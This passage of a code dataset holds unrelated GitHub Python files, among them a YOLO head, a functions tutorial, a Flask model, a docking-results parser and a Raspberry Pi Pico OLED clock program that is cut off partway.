stride=1,\n act=act,\n ),\n ]\n )\n )\n \n self.reg_preds.append(\n nn.Conv2d(\n in_channels=int(256 * width),\n out_channels=4,\n kernel_size=1,\n stride=1,\n padding=0,\n )\n )\n self.obj_preds.append(\n nn.Conv2d(\n in_channels=int(256 * width),\n out_channels=1,\n kernel_size=1,\n stride=1,\n padding=0,\n )\n )\n\n self.strides = strides\n self.in_channels=in_channels\n self.loss_fn = loss_fn\n\n def initialize_biases(self, prior_prob):\n for conv in self.obj_preds:\n b = conv.bias.view(1, -1)\n b.data.fill_(-math.log((1 - prior_prob) / prior_prob))\n conv.bias = torch.nn.Parameter(b.view(-1), requires_grad=True)\n\n def forward(self, xin):\n \n reg_outputs, obj_outputs = [], []\n \n for k, (reg_conv, x) in enumerate(zip(self.reg_convs, xin)):\n reg_feat = reg_conv(x)\n reg_output = self.reg_preds[k](reg_feat)\n obj_output = self.obj_preds[k](reg_feat)\n \n reg_outputs.append(reg_output)\n obj_outputs.append(obj_output)\n\n outputs = []\n for reg_output, obj_output in zip(reg_outputs, obj_outputs):\n output = torch.cat([reg_output, obj_output.sigmoid()], 1)\n outputs.append(output)\n \n self.hw = [x.shape[-2:] for x in outputs]\n \n outputs = torch.cat(\n [x.flatten(start_dim=2) for x in outputs], dim=2\n ).permute(0, 2, 1)\n \n outputs = self.decode_outputs(outputs, dtype=xin[0].type())\n \n return outputs\n \n \n def decode_outputs(self, outputs, dtype):\n # converted to class part-free\n grids = []\n strides = []\n for (hsize, wsize), stride in zip(self.hw, self.strides):\n yv, xv = torch.meshgrid([torch.arange(hsize), torch.arange(wsize)])\n grid = torch.stack((xv, yv), 2).view(1, -1, 2)\n grids.append(grid)\n shape = grid.shape[:2]\n strides.append(torch.full((*shape, 1), stride))\n\n grids = torch.cat(grids, dim=1).type(dtype)\n strides = torch.cat(strides, dim=1).type(dtype)\n\n outputs[..., :2] = (outputs[..., :2] + grids) * strides\n outputs[..., 2:4] = torch.exp(outputs[..., 2:4]) * strides\n return outputs","repo_name":"barisbatuhan/DASS_Det_Inference","sub_path":"dass_det/models/yolo_head.py","file_name":"yolo_head.py","file_ext":"py","file_size_in_byte":4272,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"34"} +{"seq_id":"3813452268","text":"# Syntax\n\"\"\"\ndef subroutine/functionName():\n subroutine/functionBody(code)\n subroutine/functionBody(code)\n subroutine/functionBody(code)\n subroutine/functionBody(code)\n\n#call/invoke the subroutine/function\nsubroutineName/function()\n\"\"\"\n\"A subroutine(function) may or may not have a return statement\"\n\"A subroutine(function) may or may not have parameters\"\n\n\n\"To Do: Predict, then Run, and then Investigate\"\n\n\ndef user(): # define the subroutine/function userName\n name = \"Emjay\"\n print(\"Your name is: \", name)\n\n\ndef userName(): # define the subroutine userName\n name = input((\"What is your name? \"))\n print(\"Your name is: \", name)\n\n\n# call/invoke the functioneName\n# \"Method 1\"\ndef addition(): # defines the addition function\n # variables inside a surbroutine/function have local scope\n num1 = int(input((\"Enter your first number: \")))\n num2 = int(input((\"Enter your second number: \")))\n answer = num1 + num2\n return answer\n\n\nprint(addition())\nprint(f\"Method 2\\nThe answer is {addition()}\")\n\n# \"Method 2\"\n# # Assigned the function to the variable myAddition\nmyAddition = addition()\n\nprint(f\"Method 2\\nThe answer is {myAddition}\")\n\n\n# What is the difference between a function in JS and a function in python ?\n\ndef addition(): # defines the addition function\n # variables inside a surbroutine/function have local scope\n num1 = int(input((\"Enter your first number: \")))\n num2 = int(input((\"Enter your second number: \")))\n answer = num1 + num2\n\n\n\"Exercise: modify the code in userName subroutine to convert it to a function \"\n\n\ndef userName(): # define the subroutine userName\n name = input((\"What is your name? \"))\n return f\"Your name is: {name}\"\n","repo_name":"agundogdu99/JustIT-Bootcamp","sub_path":"Python/Part4_ Subs_Funcs StrtingFiles/2_functions2/func1.py","file_name":"func1.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"17005010599","text":"from extensions import db\nfrom models.model_mixins import ModelMixins\nfrom models.token import Token\n\n\nclass Product(db.Model, ModelMixins):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(100), nullable=False)\n price = db.Column(db.Integer, nullable=False)\n date_added = db.Column(db.DateTime, nullable=False)\n\n @classmethod\n def get_product(cls, pid):\n response = cls.query.get(pid)\n return response\n\n @classmethod\n def get_all_products(cls):\n response = cls.query.all()\n return response\n\n @classmethod\n def delete_product(cls, pid):\n response = cls.query.get(pid)\n response.delete()\n\n\n\n\n","repo_name":"ArfaMaryamKhanSSI/Product_Catalog_Flask_Project","sub_path":"models/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"7115128671","text":"n,k = map(int,input().split())\n\ni = 1\ncnt = 0\nt = 0\nwhile n > 0:\n t = k**i - 1\n i += 1\n cnt += 1\n if n-t <= 0:\n break\n\nprint(cnt)\n","repo_name":"ars1208/atcoder","sub_path":"ABC156/ABC156_b.py","file_name":"ABC156_b.py","file_ext":"py","file_size_in_byte":149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"73767644897","text":"import pandas as pd\n\ndatatypes = [\"all\", \"ki\", \"kd\"]\nmodeltypes = [\n \"linearRegression\",\n \"Ridge\",\n \"Lasso\",\n \"ElasticNet\",\n \"SVR\",\n \"DecisionTree\",\n \"RandomForest\",\n]\nadditional_information = [\"final\",\"GAP\"]\nscoretypes = [\"delta_G\", \"Affinity_Data_Value\", \"pKd_pKi_pIC50\"]\nsigns = [\"positive\",\"negative\"]\n\ndata_list = []\nmodel_list = []\nadd_info_list = []\nscore_list = []\nstart = False\ntop1_number_list = []\ntop1_percent_list = []\ntop2_number_list = []\ntop2_percent_list = []\ntop3_number_list = []\ntop3_percent_list = []\nspearman_02_list = []\nspearman_03_list = []\nspearman_04_list = []\nspearman_05_list = []\nspearman_06_list = []\nspearman_07_list = []\nspearman_08_list = []\nspearman_09_list = []\nspearman_010_list = []\nconf_02_list = []\nconf_03_list = []\nconf_04_list = []\nconf_05_list = []\nconf_06_list = []\nconf_07_list = []\nconf_08_list = []\nconf_09_list = []\nconf_010_list = []\n\nfor sign in signs:\n for data in datatypes:\n for model in modeltypes:\n for add_info in additional_information:\n for score in scoretypes:\n output = open(\n f\"results_power_docking_{sign}/{data}{model}{add_info}{score}.out\", \"r\"\n )\n lines = output.readlines()\n for i, line in enumerate(lines):\n if line[:29] == \"Summary of the docking power:\":\n data_list.append(data)\n model_list.append(model)\n add_info_list.append(add_info)\n score_list.append(score)\n tmp = i\n start = True\n elif start == True:\n if i == tmp + 2:\n tmp_line = str(line).split(sep=\" \")\n top1_number = tmp_line[6]\n top1_number = top1_number[0:-1]\n top1_percent = tmp_line[-1]\n top1_percent = top1_percent[0:-1]\n top1_number_list.append(top1_number)\n top1_percent_list.append(top1_percent)\n if i == tmp + 4:\n tmp_line = str(line).split(sep=\" \")\n top2_number = tmp_line[6]\n top2_number = top2_number[0:-1]\n top2_percent = tmp_line[-1]\n top2_percent = top2_percent[0:-1]\n top2_number_list.append(top2_number)\n top2_percent_list.append(top2_percent)\n if i == tmp + 6:\n tmp_line = str(line).split(sep=\" \")\n top3_number = tmp_line[6]\n top3_number = top3_number[0:-1]\n top3_percent = tmp_line[-1]\n top3_percent = top3_percent[0:-1]\n top3_number_list.append(top3_number)\n top3_percent_list.append(top3_percent)\n if i == tmp + 7:\n tmp_line = str(line).split(sep=\" \")\n spearman_02 = tmp_line[-1]\n spearman_02 = spearman_02[0:-1]\n spearman_02_list.append(spearman_02)\n if i == tmp + 8:\n tmp_line = str(line).split()\n conf_02 = tmp_line[-3:]\n conf_02 = str(conf_02[0]) + str(conf_02[1]) + str(conf_02[2])\n conf_02_list.append(conf_02)\n if i == tmp + 9:\n tmp_line = str(line).split(sep=\" \")\n spearman_03 = tmp_line[-1]\n spearman_03 = spearman_03[0:-1]\n spearman_03_list.append(spearman_03)\n if i == tmp + 10:\n tmp_line = str(line).split()\n conf_03 = tmp_line[-3:]\n conf_03 = str(conf_03[0]) + str(conf_03[1]) + str(conf_03[2])\n conf_03_list.append(conf_03)\n if i == tmp + 11:\n tmp_line = str(line).split(sep=\" \")\n spearman_04 = tmp_line[-1]\n spearman_04 = spearman_04[0:-1]\n spearman_04_list.append(spearman_04)\n if i == tmp + 12:\n tmp_line = str(line).split()\n conf_04 = tmp_line[-3:]\n conf_04 = str(conf_04[0]) + str(conf_04[1]) + str(conf_04[2])\n conf_04_list.append(conf_04)\n if i == tmp + 13:\n tmp_line = str(line).split(sep=\" \")\n spearman_05 = tmp_line[-1]\n spearman_05 = spearman_05[0:-1]\n spearman_05_list.append(spearman_05)\n if i == tmp + 14:\n tmp_line = str(line).split()\n conf_05 = tmp_line[-3:]\n conf_05 = str(conf_05[0]) + str(conf_05[1]) + str(conf_05[2])\n conf_05_list.append(conf_05)\n if i == tmp + 15:\n tmp_line = str(line).split(sep=\" \")\n spearman_06 = tmp_line[-1]\n spearman_06 = spearman_06[0:-1]\n spearman_06_list.append(spearman_06)\n if i == tmp + 16:\n tmp_line = str(line).split()\n conf_06 = tmp_line[-3:]\n conf_06 = str(conf_06[0]) + str(conf_06[1]) + str(conf_06[2])\n conf_06_list.append(conf_06)\n if i == tmp + 17:\n tmp_line = str(line).split(sep=\" \")\n spearman_07 = tmp_line[-1]\n spearman_07 = spearman_07[0:-1]\n spearman_07_list.append(spearman_07)\n if i == tmp + 18:\n tmp_line = str(line).split()\n conf_07 = tmp_line[-3:]\n conf_07 = str(conf_07[0]) + str(conf_07[1]) + str(conf_07[2])\n conf_07_list.append(conf_07)\n if i == tmp + 19:\n tmp_line = str(line).split(sep=\" \")\n spearman_08 = tmp_line[-1]\n spearman_08 = spearman_08[0:-1]\n spearman_08_list.append(spearman_08)\n if i == tmp + 20:\n tmp_line = str(line).split()\n conf_08 = tmp_line[-3:]\n conf_08 = str(conf_08[0]) + str(conf_08[1]) + str(conf_08[2])\n conf_08_list.append(conf_08)\n if i == tmp + 21:\n tmp_line = str(line).split(sep=\" \")\n spearman_09 = tmp_line[-1]\n spearman_09 = spearman_09[0:-1]\n spearman_09_list.append(spearman_09)\n if i == tmp + 22:\n tmp_line = str(line).split()\n conf_09 = tmp_line[-3:]\n conf_09 = str(conf_09[0]) + str(conf_09[1]) + str(conf_09[2])\n conf_09_list.append(conf_09)\n if i == tmp + 23:\n tmp_line = str(line).split(sep=\" \")\n spearman_010 = tmp_line[-1]\n spearman_010 = spearman_010[0:-1]\n spearman_010_list.append(spearman_010)\n if i == tmp + 24:\n tmp_line = str(line).split()\n conf_010 = tmp_line[-3:]\n conf_010 = str(conf_010[0]) + str(conf_010[1]) + str(conf_010[2])\n conf_010_list.append(conf_010)\n \n print(data,model,add_info,score,\"Done\")\n\n\n data = {\n \"Datatype\": data_list,\n \"Modeltype\": model_list,\n \"Featuretype\": add_info_list,\n \"Scoretype\": score_list,\n \"Top1: # correct binding poses:\": top1_number_list,\n \"Top1: '%' correct binding poses:\": top1_percent_list,\n \"Top2: # correct binding poses:\": top2_number_list,\n \"Top2: '%' correct binding poses:\": top2_percent_list,\n \"Top3: # correct binding poses:\": top3_number_list,\n \"Top3: '%' correct binding poses:\": top3_percent_list,\n \"Spearman correlation coefficient in rmsd range [0-2]:\": spearman_02_list,\n \"90'%' confidence interval in rmsd range [0-2]:\": conf_02_list,\n \"Spearman correlation coefficient in rmsd range [0-3]:\": spearman_03_list,\n \"90'%' confidence interval in rmsd range [0-3]:\": conf_03_list,\n \"Spearman correlation coefficient in rmsd range [0-4]:\": spearman_04_list,\n \"90'%' confidence interval in rmsd range [0-4]:\": conf_04_list,\n \"Spearman correlation coefficient in rmsd range [0-5]:\": spearman_05_list,\n \"90'%' confidence interval in rmsd range [0-5]:\": conf_05_list,\n \"Spearman correlation coefficient in rmsd range [0-6]:\": spearman_06_list,\n \"90'%' confidence interval in rmsd range [0-6]:\": conf_06_list,\n \"Spearman correlation coefficient in rmsd range [0-7]:\": spearman_07_list,\n \"90'%' confidence interval in rmsd range [0-7]:\": conf_07_list,\n \"Spearman correlation coefficient in rmsd range [0-8]:\": spearman_08_list,\n \"90'%' confidence interval in rmsd range [0-8]:\": conf_08_list,\n \"Spearman correlation coefficient in rmsd range [0-9]:\": spearman_09_list,\n \"90'%' confidence interval in rmsd range [0-9]:\": conf_09_list,\n \"Spearman correlation coefficient in rmsd range [0-10]:\": spearman_010_list,\n \"90'%' confidence interval in rmsd range [0-10]:\": conf_010_list,\n }\n df = pd.DataFrame(data)\n df.to_csv(f\"results_power_docking_{sign}.csv\")\n","repo_name":"molinfo-vienna/phantomdragon","sub_path":"data/CASF-2016/power_docking/combine_power_docking.py","file_name":"combine_power_docking.py","file_ext":"py","file_size_in_byte":10961,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"8084316934","text":"import machine\nfrom machine import Timer, Pin, RTC\nfrom utime import sleep, sleep_ms\nfrom ssd1306 import SSD1306_I2C\nimport ds3231\nimport sht30\nimport random\nimport framebuf\nfrom math import *\n\n'''\n尽量优化程序\n同时展现树莓派pico的全部实力\n\n注释:\n1-字符都是8x8大小,自定义小字符大小为3x5\n2-屏幕左上角为(0,0),0号屏幕为主屏[128x64],1号屏幕为副屏[128x32]\n3-eval与pc版python出入较大,尽量避免使用\n4-当前涉及的技术:1)树莓派pico 2)OLED显示屏SSD1306 3)温度湿度传感器SHT-31 4)时钟元件DS3231\n'''\n\n\nclass PicoClock:\n def __init__(self):\n self.init_i2c() # 初始化i2c\n self.init_button() # 初始化物理按钮\n self.setting_control(mode='read') # 从文件读取设置\n self.init_pin() # 初始化PIN\n self.init_var() # 初始化全局变量\n self.init_icon() # 定义符号\n self.init_rtc() # 初始化rtc\n\n self.fun_MainMenu() # 进入主界面\n\n # 基础函数部分\n def init_i2c(self):\n # 定义0和1号i2c引脚\n sda_0 = machine.Pin(8)\n scl_0 = machine.Pin(9)\n # sda_1 = machine.Pin(14)\n # scl_1 = machine.Pin(15)\n\n # 定义0和1号i2c\n i2c_0 = machine.I2C(0, sda=sda_0, scl=scl_0, freq=400000)\n # i2c_1 = machine.I2C(1, sda=sda_1, scl=scl_1, freq=400000)\n\n # 测试用,打印0和1号i2c检测到的设备地址\n print('i2c_0 addr:' + str(i2c_0.scan()))\n # print('i2c_1 addr:' + str(i2c_1.scan()))\n\n # 定义oled显示屏\n self.oled_0 = SSD1306_I2C(128, 64, i2c_0, addr=0x3d)\n self.oled_1 = SSD1306_I2C(128, 32, i2c_0, addr=0x3c)\n\n def init_button(self):\n self.button_u = machine.Pin(12, machine.Pin.IN, machine.Pin.PULL_UP)\n self.button_d = machine.Pin(11, machine.Pin.IN, machine.Pin.PULL_UP)\n self.button_l = machine.Pin(26, machine.Pin.IN, machine.Pin.PULL_UP)\n self.button_r = machine.Pin(15, machine.Pin.IN, machine.Pin.PULL_UP)\n self.button_y = machine.Pin(10, machine.Pin.IN, machine.Pin.PULL_UP)\n self.button_n = machine.Pin(14, machine.Pin.IN, machine.Pin.PULL_UP)\n\n def init_switch(self):\n self.switch_fps = True\n self.switch_ShowSleepTime = True\n self.switch_ShowBootLogo = True\n\n def init_pin(self):\n # self.inner_rgb = machine.Pin(29, machine.Pin.OUT)\n pass\n\n def init_var(self):\n self.is_init_fps = 0 # fps计数器是否初始化\n self.button_gap = 0 # 按钮防抖\n self.is_button_ready = 0 # 按钮是否准备就绪\n self.refresh_scale = 3 # 副屏幕刷新速度控制,是几就代表是主屏幕的几分之一\n self.sleep_time_learning = 0 # 可变的睡眠时间\n self.fps_limit = 9 # 帧率限制\n self.time_out_count = 0 # 超时计时器当前计时\n self.time_out_limit = 15 # 超时计时器上限\n\n def init_icon(self):\n self.icon_dic = {'icon_little_a': ['010', '101', '111', '101', '101'],\n 'icon_little_b': ['110', '101', '110', '101', '110'],\n 'icon_little_c': ['011', '100', '100', '100', '011'],\n 'icon_little_d': ['110', '101', '101', '101', '110'],\n 'icon_little_e': ['111', '100', '111', '100', '111'],\n 'icon_little_f': ['111', '100', '111', '100', '100'],\n 'icon_little_g': ['111', '100', '101', '101', '111'],\n 'icon_little_h': ['101', '101', '111', '101', '101'],\n 'icon_little_i': ['111', '010', '010', '010', '111'],\n 'icon_little_j': ['011', '001', '001', '101', '111'],\n 'icon_little_k': ['101', '110', '100', '110', '101'],\n 'icon_little_l': ['100', '100', '100', '100', '111'],\n 'icon_little_m': ['101', '111', '101', '101', '101'],\n 'icon_little_n': ['000', '100', '111', '101', '101'],\n 'icon_little_o': ['111', '101', '101', '101', '111'],\n 'icon_little_p': ['110', '101', '110', '100', '100'],\n 'icon_little_q': ['011', '101', '011', '001', '001'],\n 'icon_little_r': ['110', '101', '110', '101', '101'],\n 'icon_little_s': ['011', '100', '011', '001', '110'],\n 'icon_little_t': ['111', '010', '010', '010', '010'],\n 'icon_little_u': ['101', '101', '101', '101', '111'],\n 'icon_little_v': ['101', '101', '101', '101', '010'],\n 'icon_little_w': ['101', '101', '101', '111', '101'],\n 'icon_little_x': ['101', '101', '010', '101', '101'],\n 'icon_little_y': ['101', '101', '011', '001', '011'],\n 'icon_little_z': ['111', '001', '010', '100', '111'],\n\n 'icon_little_0': ['010', '101', '101', '101', '010'],\n 'icon_little_1': ['110', '010', '010', '010', '111'],\n 'icon_little_2': ['111', '001', '111', '100', '111'],\n 'icon_little_3': ['110', '001', '011', '001', '110'],\n 'icon_little_4': ['101', '101', '111', '001', '001'],\n 'icon_little_5': ['111', '100', '110', '001', '110'],\n 'icon_little_6': ['010', '100', '111', '101', '011'],\n 'icon_little_7': ['111', '101', '001', '010', '010'],\n 'icon_little_8': ['010', '101', '010', '101', '010'],\n 'icon_little_9': ['010', '101', '011', '001', '010'],\n\n 'icon_little_ ': ['000', '000', '000', '000', '000'],\n 'icon_focus_now': ['010', '101'],\n\n 'icon_little_!': ['010', '010', '010', '000', '010'],\n 'icon_little_\"': ['101', '101'],\n 'icon_little_%': ['101', '001', '010', '100', '101'],\n 'icon_little_&': ['010', '100', '010', '101', '011'],\n 'icon_little_\\'': ['010', '010'],\n 'icon_little_(': ['001', '010', '010', '010', '001'],\n 'icon_little_)': ['100', '010', '010', '010', '100'],\n 'icon_little_*': ['000', '010', '111', '101', '000'],\n 'icon_little_+': ['000', '010', '111', '010', '000'],\n 'icon_little_,': ['000', '000', '000', '010', '100'],\n 'icon_little_-': ['000', '000', '111', '000', '000'],\n 'icon_little_.': ['000', '000', '000', '000', '010'],\n 'icon_little_/': ['001', '001', '010', '100', '100'],\n 'icon_little_:': ['000', '010', '000', '010', '000'],\n 'icon_little_;': ['000', '010', '000', '010', '100'],\n 'icon_little_<': ['000', '011', '100', '011', '000'],\n 'icon_little_=': ['000', '111', '000', '111', '000'],\n 'icon_little_>': ['000', '110', '001', '110', '000'],\n 'icon_little_?': ['111', '101', '011', '000', '010'],\n 'icon_little_[': ['011', '010', '010', '010', '011'],\n 'icon_little_\\\\': ['100', '100', '010', '001', '001'],\n 'icon_little_]': ['110', '010', '010', '010', '110'],\n 'icon_little_^': ['010', '101'],\n 'icon_little__': ['000', '000', '000', '000', '000'],\n 'icon_little_`': ['10', '01'],\n 'icon_little_{': ['001', '010', '110', '010', '001'],\n 'icon_little_|': ['01', '01', '01', '01', '01'],\n 'icon_little_}': ['100', '010', '011', '010', '100'],\n\n 'icon_°': ['111', '101', '111']}\n self.icon_dic_keys = list(self.icon_dic.keys())\n self.icon_dic_keys.sort()\n\n def init_rtc(self, mode='init'):\n if mode == 'init':\n self.rtc = RTC()\n\n t = ds3231.ReportList() # 获取时间\n\n sec = t[0]\n min = t[1]\n hou = t[2]\n day = t[4]\n mon = t[5]\n yea = t[6]\n\n tuple = (2000+yea, mon, day, 0, hou, min, sec, 0)\n\n self.rtc.datetime(tuple)\n\n\n # 自定义绘制方法\n def draw_border(self, id=0):\n if id == 0:\n self.oled_0.rect(0, 0, 128, 64, 1)\n elif id == 1:\n self.oled_1.rect(0, 0, 128, 32, 1)\n\n def draw_vline(self, x, id=0, leng=0):\n if id == 0:\n if leng == 0:\n leng = 64\n self.oled_0.vline(x, int((64 - leng) / 2), leng, 1)\n elif id == 1:\n if leng == 0:\n leng = 32\n self.oled_1.vline(x, int((32 - leng) / 2), leng, 1)\n\n def draw_hline(self, y, id=0, leng=0):\n if id == 0:\n if leng == 0:\n leng = 128\n self.oled_0.hline(int((128 - leng) / 2), y, leng, 1)\n elif id == 1:\n if leng == 0:\n leng = 128\n self.oled_1.hline(int((128 - leng) / 2), y, leng, 1)\n\n def clear(self, id=0):\n if id == 0:\n self.oled_0.fill(0)\n elif id == 1:\n self.oled_1.fill(0)\n else:\n self.oled_0.fill(0)\n self.oled_1.fill(0)\n\n def show(self, id=0):\n if id == 0:\n self.oled_0.show()\n elif id == 1:\n self.oled_1.show()\n else:\n self.oled_0.show()\n self.oled_1.show()\n\n def draw_icon(self, lis, x0, y0, id=0):\n for y in range(len(lis)):\n for x in range(len(lis[y])):\n if lis[y][x] == '1' and id == 0:\n self.oled_0.pixel(x0 + x, y0 + y, 1)\n elif lis[y][x] == '1' and id == 1:\n self.oled_1.pixel(x0 + x, y0 + y, 1)\n\n # 自定义文本方法\n def text_l(self, text, y, border=3, id=0):\n text = str(text)\n if id == 0:\n self.oled_0.text(text, 0 + border, y)\n elif id == 1:\n self.oled_1.text(text, 0 + border, y)\n else:\n return 1\n\n def text_lc(self, text, y, border=3, id=0):\n text = str(text)\n leng = len(text) * 8\n if id == 0:\n self.oled_0.fill_rect(0 + border, y, leng, 8, 0)\n elif id == 1:\n self.oled_1.fill_rect(0 + border, y, leng, 8, 0)\n else:\n return 1\n\n def text_r(self, text, y, border=3, id=0):\n text = str(text)\n leng = len(text) * 8\n if id == 0:\n self.oled_0.text(text, 128 - border - leng, y)\n elif id == 1:\n self.oled_1.text(text, 128 - border - leng, y)\n else:\n return 1\n\n def text_rc(self, text, y, id=0):\n text = str(text)\n leng = len(text) * 8\n if id == 0:\n self.oled_0.fill_rect(128 - leng, y, leng, 8, 0)\n elif id == 1:\n self.oled_1.fill_rect(128 - leng, y, leng, 8, 0)\n else:\n return 1\n\n def text_m(self, text, y, id=0):\n text = str(text)\n leng = len(str(text)) * 8\n if id == 0:\n self.oled_0.text(text, int((128 - leng) / 2), y)\n elif id == 1:\n self.oled_1.text(text, int((128 - leng) / 2), y)\n else:\n return 1\n\n def text_mc(self, text, y, id=0):\n text = str(text)\n leng = len(str(text)) * 8\n if id == 0:\n self.oled_0.fill_rect(int((128 - leng) / 2), y, leng, 8, 0)\n elif id == 1:\n self.oled_1.fill_rect(int((128 - leng) / 2), y, leng, 8, 0)\n else:\n return 1\n\n def text_clear(self, x, y, length, height=8, id=0):\n if id == 0:\n self.oled_0.fill_rect(x, y, length, height, 0)\n if id == 1:\n self.oled_1.fill_rect(x, y, length, height, 0)\n\n def simple_bar(self, y, leng, index, id=0):\n text = '{' + index * '-' + '=' + (leng - index - 1) * '-' + '}'\n self.text_m(text, y, id=id)\n\n def text_little(self, text, x, y, id=0):\n text = str(text).lower()\n for i in range(len(text)):\n self.draw_icon(lis=self.icon_dic.get(\"icon_little_\" + text[i]), x0=x + 4 * i, y0=y + 2, id=id)\n\n # 关键函数部分\n def button_sign(self):\n if self.button_u.value() == 0:\n self.sleep_button()\n if self.button_u.value() == 0:\n # self.inner_rgb.value(1)\n return 'u'\n elif self.button_d.value() == 0:\n self.sleep_button()\n if self.button_d.value() == 0:\n # self.inner_rgb.value(1)\n return 'd'\n elif self.button_l.value() == 0:\n self.sleep_button()\n if self.button_l.value() == 0:\n # self.inner_rgb.value(1)\n return 'l'\n elif self.button_r.value() == 0:\n self.sleep_button()\n if self.button_r.value() == 0:\n # self.inner_rgb.value(1)\n return 'r'\n elif self.button_y.value() == 0:\n self.sleep_button()\n if self.button_y.value() == 0:\n # self.inner_rgb.value(1)\n return 'y'\n elif self.button_n.value() == 0:\n self.sleep_button()\n if self.button_n.value() == 0:\n # self.inner_rgb.value(1)\n return 'n'\n else:\n # self.inner_rgb.value(0)\n return 0\n\n def show_fps(self, s, id=0, switch=1):\n if self.is_init_fps == 0:\n self.sec_buffer = '0' # 用于记录当前秒数\n self.frame_counter = 0 # 记帧器\n self.fps = 0 # 一秒帧数\n self.is_init_fps = 1\n\n if self.sec_buffer != s:\n self.sec_buffer = s\n self.fps = self.frame_counter\n self.frame_counter = 0\n else:\n self.frame_counter += 1\n\n if self.switch_fps and switch:\n leng = len(str(self.fps)) * 8 + 32 # 32=4*8\n if id == 0:\n self.text_clear(0, 0, length=leng)\n self.text_l(\"fps=\" + str(self.fps), 0, border=0, id=0)\n\n if self.switch_ShowSleepTime and switch:\n leng = len(str(self.sleep_time_learning)) * 8 + 32\n self.text_clear(128 - leng, 0, leng)\n self.text_r(\"stl=\" + str(self.sleep_time_learning), 0, border=0)\n\n def sleep_button(self):\n sleep_ms(self.button_gap)\n\n def fps_limiter(self, limit, frame_count=0, fps=0):\n if frame_count > limit + 1 and self.sleep_time_learning <= 60:\n self.sleep_time_learning += 1\n elif fps < limit - 1 and self.sleep_time_learning > 0:\n if random.randint(0, 1): # 减缓延时下降速度\n self.sleep_time_learning -= 1\n sleep_ms(self.sleep_time_learning)\n\n def setting_control(self, mode):\n file_name = 'setting.ini'\n # 读\n if mode == 'read':\n try:\n with open(file_name, 'r') as f:\n self.setting_dic = eval(f.read())\n # 从字典读取设置\n self.switch_fps = self.setting_dic.get('Show FPS')\n self.switch_ShowSleepTime = self.setting_dic.get('Show STL')\n self.switch_ShowBootLogo = self.setting_dic.get('Boot Logo')\n print(file_name + \" Loaded\")\n print(\"setting_dic=\" + str(self.setting_dic))\n except Exception:\n print(\"Load Failed\")\n self.init_switch() # 初始化设置\n self.setting_control(mode='initwrite')\n # 初始化写\n elif mode == 'initwrite':\n try:\n # 初始化设置字典\n self.setting_dic = {'Show FPS': self.switch_fps,\n 'Show STL': self.switch_ShowSleepTime,\n 'Boot Logo': self.switch_ShowBootLogo}\n # 写入文件\n with open(file_name, 'w') as f:\n f.write(str(self.setting_dic))\n print(file_name + \" Initialized\")\n except OSError:\n # 如果出错\n self.error_window('OSError')\n # 覆写设置\n elif mode == 'overwrite':\n try:\n # 写入文件\n with open(file_name, 'w') as f:\n f.write(str(self.setting_dic))\n print(file_name + \" Updated\")\n except OSError:\n # 如果出错\n self.error_window('OSError')\n # 更新(先写再读)\n elif mode == 'update':\n self.setting_control(mode='overwrite')\n self.setting_control(mode='read')\n print(\"Setting Updated And Loaded\")\n\n # 重要功能部分 # 主界面\n def fun_MainMenu(self):\n self.is_init_fps = 0 # fps计数器初始化\n self.is_button_ready = 0 # 按钮复位标志初始化\n is_oled_1_need_refresh = 1\n week_lis = [\"Mon\", \"Tues\", \"Wed\", \"Thur\", \"Fri\", \"Sat\", \"Sun\"] # 星期名\n\n self.clear(id=2)\n self.show(id=2) # 清空两个屏幕\n\n if self.switch_ShowBootLogo:\n self.fun_BootLogo()\n\n while True:\n self.current_time = self.rtc.datetime() # 获取时间\n\n # 按钮部分\n ButtonSign = self.button_sign() # 获取按钮状态\n # 检测按钮做出反应\n if ButtonSign != 0 and self.is_button_ready == 1:\n self.is_button_ready = 0\n is_oled_1_need_refresh = 1\n if ButtonSign == 'y':\n self.fun_SubMenu()\n elif ButtonSign == 'n':\n self.fun_PowerSave()\n elif ButtonSign == 0 and self.is_button_ready == 0:\n self.is_button_ready = 1\n\n ###主屏幕内容###\n self.clear() # 清除所有\n try:\n # 绘制时间\n self.text_m(\"%02d:%02d:%02d\" % (self.current_time[4], self.current_time[5], self.current_time[6]), 18)\n # 绘制日期\n self.text_m(\"%d/%02d/%02d\" % (self.current_time[0], self.current_time[1], self.current_time[2]), 28)\n # 绘制星期\n self.text_m(\"%s\" % (week_lis[self.current_time[3]]), 38)\n\n self.show_fps(s=self.current_time[6]) # 显示fps\n except:\n pass\n\n self.show() # 绘制所有\n\n ###副屏幕内容###\n if self.frame_counter == 0 and is_oled_1_need_refresh == 1:\n self.clear(id=1) # 清除所有\n self.text_m(\"Hello World\", 12, id=1)\n self.show(id=1) # 绘制所有\n is_oled_1_need_refresh = 0\n\n self.fps_limiter(limit=self.fps_limit, frame_count=self.frame_counter, fps=self.fps) # 等待\n\n # 细分菜单\n def fun_SubMenu(self):\n self.is_init_fps = 0 # fps计数器初始化\n self.is_button_ready = 0 # 按钮复位标志初始化\n self.sec_buffer = self.current_time[6]\n\n # 功能代号\n SHT31 = 'Temp & RH'\n BaseConverter = 'Base Converter'\n REPL = 'EZ REPL'\n IconTest = 'Icon Test'\n fx = 'fx'\n Setting = 'Setting'\n UnitConverter = 'Unit Converter'\n\n index_lis = [SHT31, BaseConverter, UnitConverter, REPL, Setting]\n index_lis_len = len(index_lis)\n index_now = 0\n\n self.clear(id=2)\n self.show(id=2) # 清空两个屏幕\n while True:\n self.current_time = self.rtc.datetime() # 获取时间\n\n # 按钮部分\n ButtonSign = self.button_sign() # 获取按钮状态\n # 检测按钮做出反应\n if ButtonSign != 0 and self.is_button_ready == 1:\n self.is_button_ready = 0\n # 确认按钮\n if ButtonSign == 'y':\n if index_lis[index_now] == 'Main Menu':\n return 0\n elif index_lis[index_now] == SHT31:\n self.fun_SHT31()\n elif index_lis[index_now] == BaseConverter:\n self.fun_BaseConverter()\n elif index_lis[index_now] == REPL:\n self.fun_REPL()\n elif index_lis[index_now] == Setting:\n self.fun_Setting()\n elif index_lis[index_now] == UnitConverter:\n 